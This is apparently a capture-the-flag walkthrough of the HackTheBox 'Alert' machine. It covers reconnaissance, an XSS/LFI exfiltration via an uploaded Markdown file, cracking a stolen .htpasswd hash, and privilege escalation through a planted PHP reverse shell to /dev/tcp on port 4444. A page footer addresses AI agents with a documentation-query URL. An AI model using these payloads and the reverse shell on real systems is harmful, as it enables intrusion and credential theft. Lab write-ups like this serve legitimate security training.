{% embed url="" %}
Link
{% endembed %}
## Reconnaissance
### Nmap Scanning Process
{% hint style="info" %}
Nmap, a network discovery tool, involves several steps:
1. **Host Discovery**: Identify live hosts using ICMP, TCP, or UDP packets.
2. **Port Scanning**: Scan for open ports on discovered hosts.
3. **Service Detection**: Determine running services and versions on open ports.
4. **OS Detection**: Detect the operating system of remote hosts.
5. **Script Scanning**: Use Nmap scripts for tasks like vulnerability detection.
6. **Output Options**: Save results in various formats for analysis or reporting.
{% endhint %}
These steps aid in mapping network topology and assessing security. The picture shows the machine has two open ports. **80 & 22**.
Result of Nmap
* **Port 80**: This port is commonly used for HTTP (Hypertext Transfer Protocol) traffic, which forms the foundation of the web. It is the default port for web servers to accept requests from web browsers over an unencrypted connection.
* **Port 22**: Known as the default port for SSH (Secure Shell), it allows secure management and data transfer over unsecured networks. SSH is commonly used for remote server management and secure file transfers.
#### Subdomain Discovery Using Fuzzing Method
{% hint style="info" %}
The fuzzing method involves sending a series of test inputs to identify valid subdomains for a given domain. The `ffuf` (Fuzz Faster U Fool) tool can be used to automate this process by:
1. **Command Structure**: The basic command format includes the target domain, header options, and wordlist.
2. **URL and Header**: Specify the URL you are targeting and use the `-H` option to set a header with a placeholder (FUZZ) for potential subdomains.
3. **Wordlist**: Utilize a wordlist containing common subdomain names to systematically test each entry. The `-w` option specifies the path to this list.
4. **Status Code Filtering**: Use `-fc` to filter out certain HTTP status codes (e.g., 301) to focus on potential subdomains that yield different responses.
This fuzzy testing helps uncover hidden or unlisted subdomains by systematically trying each entry in the provided wordlist.
{% endhint %}
```bash
ffuf -c -u http://alert.htb -H "Host: FUZZ.alert.htb" -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -fc 301
```
## Identifying Bugs
Through analysis, it is clear that the page accepts a Markdown (`.md`) file as input and renders it. After doing some tests in Burp Suite, I suspected [XSS](https://owasp.org/www-community/attacks/xss/) and decided to test it.
{% hint style="info" %}
**Burp Suite** is a powerful web vulnerability scanner and testing framework used primarily for assessing the security of web applications.
{% endhint %}
## Exploitation
Our payload will look like :clap:
**Hosting a Malicious Server**
```bash
python3 -m http.server 8888
```
**Malicious Markdown File (MD File)**
```html
//xx.xx => Should be replaced by your local IP
```
When this file was uploaded, it exploited the application's LFI vulnerability to retrieve private files and send their contents to my Python server. I then received the vulnerable '***filepath***'.
To get the password of user, I accessed the [.htpasswd](https://www.nexcess.net/help/apache-htpasswd-file/#:~:text=htpasswd%20file%2C%20a%20flat%2Dfile,information%2C%20visit%20apache.org.)[ ](https://www.nexcess.net/help/apache-htpasswd-file/#:~:text=htpasswd%20file%2C%20a%20flat%2Dfile,information%2C%20visit%20apache.org.)vulnerable file from statistics subdomain, where it was initially asking user's username and password.
{% hint style="info" %}
**A `.htpasswd` file is a flat file used to store usernames and passwords for basic authentication on an Apache HTTP Server.**
{% endhint %}
```html
```
Uploading the payload
* [x] After uploading it, go to **Share Markdown** and copy the generated link: `http://alert.htb/visualizer.php?link_share=...`
* [x] Go back to the Contact Us page, fill out any email address, and paste the link in the message box.
Triggering the exploit
## User Flag
Output
So, the encrypted password of the user will be:
```
%3Cpre%3Ealbert%3A%24apr1%24bMoRBJOg%24igG8WBtQ1xYDTQdLjSWZQ%2F%0A%3C%2Fpre%3E%0A
```
Put it on the CyberChef and decode it by URL Decoding Recipe : [Result](https://gchq.github.io/CyberChef/#recipe=URL_Decode\(\)\&input=JTNDcHJlJTNFYWxiZXJ0JTNBJTI0YXByMSUyNGJNb1JCSk9nJTI0aWdHOFdCdFExeFlEVFFkTGpTV1pRJTJGJTBBJTNDJTJGcHJlJTNFJTBB)
```
albert:$apr1$bMoRBJOg$igG8WBtQ1xYDTQdLjSWZQ/
username -> albert
encrypted password as a hash -> $apr1$bMoRBJOg$igG8WBtQ1xYDTQdLjSWZQ/
```
***
In order to decrypt the password, we need to identify the hash type. Here, I used the [Hashcat cheatsheet](https://hashcat.net/wiki/doku.php?id=example_hashes) and found it.
| 1600 | Apache $apr1$ MD5, md5apr1, MD5 (APR) |
| ---- | ------------------------------------- |
{% hint style="info" %}
Hashcat is a powerful password recovery tool that supports many hashing algorithms and attack modes. It is known for its speed, versatility, and GPU acceleration, making it ideal for security testing and forensics.
{% endhint %}
```bash
hashcat -m 1600 -a 0 hash.txt /usr/share/wordlists/rockyou.txt
```
***
Since Hashcat requires quite a large amount of memory, you can use [John the Ripper](https://www.openwall.com/john/) instead.
***
```bash
john --wordlist=/usr/share/wordlists/rockyou.txt --format=md5crypt-long hash.txt
```
Password of user
BOOM!!!
Go login as a user and read the user.txt file.
```
ssh albert@10.10.11.44
```
## Root Flag
**Privilege Escalation**
{% hint style="info" %}
**LinPEAS.sh** is a script designed to enumerate possible paths to escalate privileges on Linux systems. It automates the process of searching for potential vulnerabilities and misconfigurations that could be exploited to gain higher-level access, making it a useful tool for system administrators and security professionals in identifying and mitigating risks.
{% endhint %}
**Open port: 8080**
```bash
ssh -L 8080:127.0.0.1:8080 albert@alert.htb
```
**Testing the open port locally using ssh**
Accessing Locally
The most interesting part is that the /opt directory has root permissions, providing a great opportunity to upload our shell and execute it from the browser.
{% stepper %}
{% step %}
### Create shell.php file
```php
/dev/tcp/10.10.**.**/4444 0>&1'"); ?>
```
{% endstep %}
{% step %}
### Insert the file into /opt/website-monitor/config directory
{% endstep %}
{% step %}
### Start netcat listener
```
nc -lnvp 4444
```
{% endstep %}
{% step %}
### Execute the shell from the port 8080
```
http://127.0.0.1:8080/config/shell.php
```
{% endstep %}
{% endstepper %}
The End!!! :end:
Thank you!!! :pray:
{% embed url="" %}
---
# Agent Instructions: Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.
Perform an HTTP GET request on the current page URL with the `ask` query parameter:
```
GET https://zwique.gitbook.io/zwique_notes/writeups/hackthebox/alert.md?ask=
```
The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.
Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
